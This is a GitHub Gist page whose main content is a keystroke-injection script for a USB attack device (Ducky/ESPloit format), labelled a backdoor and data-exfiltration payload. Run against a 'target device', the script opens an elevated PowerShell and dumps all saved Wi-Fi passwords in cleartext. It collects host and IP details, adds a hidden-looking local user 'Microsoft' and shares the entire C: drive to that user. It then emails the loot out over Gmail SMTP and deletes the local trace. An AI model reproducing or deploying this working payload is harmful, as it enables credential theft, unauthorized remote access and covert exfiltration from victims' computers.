Last active
September 21, 2019 20:47
-
-
Save YourFriendCaspian/999e00fdcd3ccafd1df2a92ec80d29f4 to your computer and use it in GitHub Desktop.
This simple script will grab all of the wifi passwords, external IP address, LAN address, and hostname of the target device and e-mail it to an address of your choice. I recommend you use a Gmail address for this. I have not had luck with Yahoo, Hotmail, etc... It then creates a user called Microsoft, and shares C:\ out to the new user. My goal …
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Rem:Generated by Dckuino.js by NURRL | |
| Rem:Modified for use with ESPloit by Corey Harding | |
| Rem:----- | |
| Rem:# Backdoor - Data Exfiltration | |
| Rem:# Credit goes to Crumb93 and BrainEater from the Hak5 forums for the Wifi Password one liner | |
| CustomDelay:1000 | |
| Press:131+100 | |
| CustomDelay:450 | |
| Press:131+114 | |
| CustomDelay:450 | |
| Print:powershell Start-Process powershell -Verb runAs | |
| CustomDelay:30 | |
| Press:176 | |
| CustomDelay:500 | |
| Press:130+121 | |
| CustomDelay:1000 | |
| Rem:***************** | |
| Rem:# We're going to grab all wifi passwords | |
| Rem:***************** | |
| Print:(netsh wlan show profiles) | Select-String \"\\:(.+)$\" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=\"$name\" key=clear)} | Select-String \"Key Content\\W+\\:(.+)$\" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize > C:\\Information.txt | |
| Press:176 | |
| CustomDelay:500 | |
| Rem:***************** | |
| Rem:# Now we'll grab Network Information (Local IP, Public IP, Hostname) | |
| Rem:***************** | |
| Print:$command = {hostname; Get-NetIpaddress | Where PrefixOrigin -EQ DHCP; Invoke-RestMethod http://ipinfo.io/json | Select -exp ip} | |
| Press:176 | |
| CustomDelay:60 | |
| Print:$command.InvokeReturnAsIs() | Out-File C:\\Information.txt -Append | |
| Press:176 | |
| CustomDelay:400 | |
| Rem:***************** | |
| Rem:# We're going to add a user | |
| Rem:***************** | |
| Print:NET USER Microsoft \"l33t\" /ADD | |
| Press:176 | |
| CustomDelay:100 | |
| Rem:***************** | |
| Rem:# Now we're going to share the C:\ drive out | |
| Rem:***************** | |
| Print:New-SmbShare -Name \"Microsoft\" -Path \"C:\\\" -FullAccess \"Microsoft\" | |
| Press:176 | |
| CustomDelay:100 | |
| Rem:***************** | |
| Rem:# Let's e-mail ourselves and clean up | |
| Rem:***************** | |
| CustomDelay:1000 | |
| Print:$SMTPServer = 'smtp.gmail.com' | |
| Press:176 | |
| Print:$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) | |
| Press:176 | |
| Print:$SMTPInfo.EnableSSL = $true | |
| Press:176 | |
| Print:$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('EMAILHERE', 'PASSWORDHERE!') | |
| Press:176 | |
| Print:$ReportEmail = New-Object System.Net.Mail.MailMessage | |
| Press:176 | |
| Print:$ReportEmail.From = 'EMAILHERE' | |
| Press:176 | |
| Print:$ReportEmail.To.Add('EMAILHERE') | |
| Press:176 | |
| Print:$ReportEmail.Subject = 'Hello from the duck' | |
| Press:176 | |
| Print:$ReportEmail.Body = (Get-Content C:\\Information.txt | out-string) | |
| Press:176 | |
| Print:$SMTPInfo.Send($ReportEmail) | |
| Press:176 | |
| CustomDelay:100 | |
| Rem:***************** | |
| Rem:# Cleanup | |
| Rem:***************** | |
| Print:del C:\\Information.txt | |
| Press:176 | |
| Print:exit | |
| Press:176 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment